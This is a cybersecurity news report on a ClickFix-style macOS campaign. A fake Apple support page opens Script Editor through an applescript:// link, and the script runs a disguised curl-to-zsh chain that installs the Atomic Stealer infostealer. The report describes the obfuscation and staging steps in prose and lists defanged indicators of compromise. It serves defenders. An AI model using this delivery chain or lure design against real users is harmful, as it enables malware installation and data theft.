ClickFix macOS Attack Strengthens Evasion Techniques by Leveraging Script Editor

A newly identified ClickFix-style macOS attack highlights the evolving tactics of threat actors as they refine their methods to bypass security measures. This campaign marks a significant departure from traditional attack vectors by utilizing macOS Script Editor as the primary execution tool, rather than relying on the Terminal application. This strategic shift enables attackers to evade detection mechanisms that are typically focused on monitoring Terminal activity.

The modification in execution strategy is particularly noteworthy as it retains the familiar ClickFix social engineering approach while changing the execution of malicious commands. By rerouting the execution through macOS Script Editor, attackers minimize their exposure to newer security protections and create an alternative pathway that is less likely to be scrutinized by both users and security tools.

A Shift in ClickFix-Style macOS Attack Techniques

Historically, ClickFix campaigns have employed social engineering tactics that deceive users into copying and pasting malicious commands into the Terminal. These commands are often disguised as routine maintenance or troubleshooting steps. However, the newly discovered ClickFix-style macOS attack completely abandons this approach.

Instead, attackers are now leveraging macOS Script Editor as their primary execution vector. Although Script Editor has been previously exploited for malware delivery, its current use, combined with a browser-triggered workflow, signifies a strategic evolution. The attack is initiated through a convincing Apple-themed webpage, which plays a crucial role in misleading users.

Jamf researchers have noted that Apple attempted to counter Terminal-based abuse in macOS 26.4 by introducing a feature that scans pasted commands prior to execution. While this measure adds an additional layer of friction, attackers have adapted by shifting to a different tool, underscoring the ongoing cat-and-mouse dynamic in cybersecurity.

The Role of the Apple-Themed Webpage

The attack commences with a well-crafted Apple-themed webpage that mimics an official support page titled “Reclaim disk space on your Mac.” This page provides step-by-step instructions that closely resemble legitimate system maintenance guidance.

Users are prompted to run a cleanup script to free up storage space. Upon clicking the “Execute” button, the page triggers an applescript:// URL scheme, which initiates the next phase of the attack.

This mechanism introduces several key differences from traditional ClickFix campaigns:

• The browser invokes the applescript:// URL scheme.
• Users are prompted to use Script Editor to open the script.
• A pre-filled script automatically appears within macOS Script Editor.
• The user is encouraged to execute the script.

This workflow reduces the need for manual input, making the attack smoother and potentially more convincing.

Execution Flow and Obfuscation

Once inside macOS Script Editor, the user is presented with a script that appears to perform legitimate cleanup operations. However, behind the scenes, the script executes an obfuscated shell command.

The command employs string manipulation via the tr utility to decode a hidden URL at runtime. Once decoded, it resolves to a remote server hosting the malicious payload. The command follows a familiar structure:

• Obfuscation: Encoded strings are transformed into valid URLs.
• Payload retrieval: A curl request fetches remote content, with the -k flag disabling TLS certificate validation.
• Execution: The downloaded content is piped directly into zsh, allowing in-memory execution without writing to disk.

If successful, this step delivers a second-stage payload, which is further obfuscated using base64 encoding and gzip compression.

Second-Stage Payload and Atomic Stealer

After decoding, the second-stage script downloads a Mach-O executable file to the /tmp directory. The script performs several actions:

• Downloads the binary from a remote server.
• Removes extended file attributes.
• Assigns execution permissions.
• Executes the binary.

The final payload has been identified as a variant of Atomic Stealer, an infostealer known for targeting sensitive user data. This staged delivery method allows attackers to keep the initial script small and less detectable while reserving the primary malicious functionality for later execution.

Behavior Across macOS Versions

The behavior of macOS Script Editor during this attack varies depending on the operating system version. On macOS 26.0, the script opens directly, allowing immediate execution. However, macOS 26.4 introduces additional safeguards.

In newer versions, users receive a warning indicating that the script originates from an unidentified developer. They must explicitly permit the creation and execution of the script document, adding another layer of user interaction. Despite this, the attack remains effective if users follow the prompts, emphasizing the continued efficacy of social engineering tactics.

Indicators of Compromise

Researchers have identified several indicators associated with this ClickFix-style macOS attack:

• Domain: dryvecar[.]com (linked to the infostealer payload)
• Malicious webpages:
  • storage-fixes.squarespace[.]com
  • cleanupmac.mssg[.]me
• File: helper (Mach-O executable)
• SHA256: 3d3c91ee762668c85b74859e4d09a2adfd34841694493b82659fda77fe0c2c44

These indicators can assist security teams in detecting and responding to related threats.

Source: thecyberexpress.com

Keep reading for the latest cybersecurity developments, threat intelligence and breaking updates from across the Middle East.